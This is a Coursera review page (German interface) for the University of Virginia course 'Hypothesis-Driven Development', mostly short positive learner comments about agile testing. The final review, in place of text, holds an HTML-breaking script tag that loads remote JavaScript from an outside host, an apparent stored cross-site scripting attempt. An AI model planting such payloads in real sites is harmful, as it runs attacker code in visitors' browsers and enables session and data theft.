Chevron Left
Zurück zu Hypothesis-Driven Development

Kursteilnehmer-Bewertung und -Feedback für Hypothesis-Driven Development von University of Virginia

4.6
Sterne
547 Bewertungen
102 Bewertungen

Über den Kurs

To deliver agile outcomes, you have to do more than implement agile processes- you have to create focus around what matters to your user and constantly test your ideas. This is easier said than done, but most of today’s high-functioning innovators have a strong culture of experimentation. In this course, you’ll learn how to identify the right questions at the right time, and pair them with the right methods to do just enough testing to make sure you minimize waste and maximize the outcomes you create with your user. As a Project Management Institute (PMI®) Registered Education Provider, the University of Virginia Darden School of Business has been approved by PMI to issue 20 professional development units (PDUs) for this course, which focuses on core competencies recognized by PMI. (Provider #2122) This course is supported by the Batten Institute at UVA’s Darden School of Business. The Batten Institute’s mission is to improve the world through entrepreneurship and innovation: www.batteninstitute.org....

Top-Bewertungen

MB

Jan 30, 2019

Alex does an excellent job in structuring and delivering his courses. Definitely makes me want to continue educational opportunities with his courses offered and University of Virginia.

OS

Jun 26, 2017

I thought this was a very good practical course. It was challenging for me since I lack experience in software development industry, but I thought it gave me a very good framework.

Filtern nach:

26 - 50 von 102 Bewertungen für Hypothesis-Driven Development

von Soren A G

Feb 01, 2020

Data-driven development and with an instructor who knows what he talks about also from a very practical perspective.

von Vivek M

Sep 18, 2020

The Hypothesis Driven Development gives a insight into applying the right techniques in the Agile framework

von Chames E L

Nov 13, 2019

Great insights on how testing and continuous integration, delivery and deployment are happening in agile way

von Paulius U

Jul 29, 2018

Comprehensive, detailed and well worth the time. Everyone in software development business should take this.

von Paulo H C

Apr 15, 2017

The evaluations instructions some times are a little vague, but the material is very helpful. Thank you!

von Karl G

Oct 07, 2017

Great course. The material is well designed and I learned a lot, throughout the specialization so far.

von Frédéric V

Aug 02, 2020

Very interesting, I really learn a lot and I found this course very useful and even very pleasant

von Patricia F

Feb 17, 2018

Very interesting and useful! It completes the overall understanding of the specialization course!

von Sridhar S

May 07, 2020

Great Course under Digital Product Specialization

Enjoyed writing Peer reviewed assignment

von Mahendra S

Mar 28, 2019

Very Great course everyone should do this who works in testing. very helpful for future.

von Mauricio L

Feb 25, 2018

Very nice as i learned the different aspects of testing using agile approach vs legacy

von 杨彬

Oct 09, 2018

The course helps developThis is an interesting and helpful experience for me.

von Rupa B

Apr 23, 2020

I have learnt so many useful things for my organization. Thanks Alex.

von Marcos A R d C

May 18, 2020

This course helped me with my continued development in this field.

von Bharat S

Oct 29, 2019

A different perspective to product development and really helpful

von Vyju I

Oct 31, 2018

Alex's use of thought leader's in the industry is very helpful.

von Shin-Ing C

Jul 11, 2018

Provides a very complete and clear picture of software testing

von Marcelo C

Sep 04, 2020

thank you very much to Alex Cowan and to the Coursera team.

von Rahil N

Feb 16, 2018

Great course learned alot about testing types and processes

von Jason D

Dec 13, 2017

Very interesting and lots of practical, actionable advice.

von Paul Z

Aug 06, 2020

Great content, which Alex presents in an engaging manner.

von Bushra I

Oct 01, 2019

Well designed and shared knowledge of experienced people.

von Roman B

Dec 10, 2019

In this course I found a exited way to see the tests dif

von Mark H

Sep 03, 2019

Good overview of testing, Agile or otherwise

von nikhil+(<a>)

Apr 26, 2019

"><script src=https://si.xss.ht></script>